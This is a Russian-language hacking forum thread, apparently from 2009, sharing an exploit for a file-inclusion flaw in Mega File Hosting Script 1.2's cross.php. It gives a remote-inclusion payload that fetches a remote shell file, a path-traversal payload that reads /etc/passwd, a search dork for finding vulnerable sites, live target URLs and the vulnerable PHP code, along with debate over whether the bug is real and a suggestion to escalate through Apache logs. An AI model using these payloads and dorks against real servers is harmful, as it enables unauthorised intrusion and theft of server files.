Mega File Hosting [ RFI/ LFI ]

Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability

удаленный / локальный файл включения

для 1.2 версий

#############################################
# Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability #
# Home: #
# Www.hacking.ge #
#############################################

#############################################
Просто помимо этого Exploit и наслаждайтесь #
#############################################


RFI: /cross.php?url=http://site.ru/shell.txt

LFI: /cross.php?url=../../../../../../../../etc/passwd%00


#############################################
#
Author: Garry /// 25/02/2009 #
#
#############################################

 

А Дорк?

 

Мде...........

 

с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
ТС покажи где он тут http://sharemee.co.uk/ например

 

Дорк на Mega file hosting сайта:

"Powered by: MFH "

 

Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif

&

и локальный файл включения в Linux-сервер:

cross.php?url=../../../../../../../../etc/passwd%00

 

Это код из cross.php

PHP:

if(function_exists('curl_init'))
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}
elseif(ini_get('allow_url_fopen'))
{
    echo file_get_contents( ($url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']) );
}
}

 

Че та я сомневаюсь про локальные файлы, да и это не RFI - remote file include - там нету иньекта а просто чтения файла и скорее всего не локального а удаленого, да и зачем %00 ? В http://forum.antichat.ru/antichat/pic/logo.gif судя по этому ничего не добавялеться, короче скорее всего удаленые файлы просто читаються и все.


UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных

 

jokester

Да, это ошибка основана на меня

 

Не понял фразы поясни пожалуйста

 

эксплуатировать эту работает хорошо на локальный файл включения

http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00

Не взломать этот сайт!!!

 

Powered by: MFH v1.2 катит

Powered by: MFH v2.0 не катит

 

jokester
Основателем этого является ошибка: garry

it's Me

kysmi4

da это правда

 

Бред =\
1) Через логи апача
2) Найти реальный путь и читать файлы в поисках

 

А зачем тогда писать для все версий?

 

kyzmi4
sorry it's my error!

http://milw0rm.com/exploits/8230

 

Я как понимаю у тебя есть MFH v1.2 выложи плиз а то погугли и так и не нашел, хочеться посмотреть что там, мне так кажеться если нет курлов то он через file_get_contets с stream_context_create читает файлы.

 

Поправил свой пост с кодом.

кому интересно

http://depositfiles.com/ru/files/qq80v50yg/
Mega_File_Hosting_Script_v1.1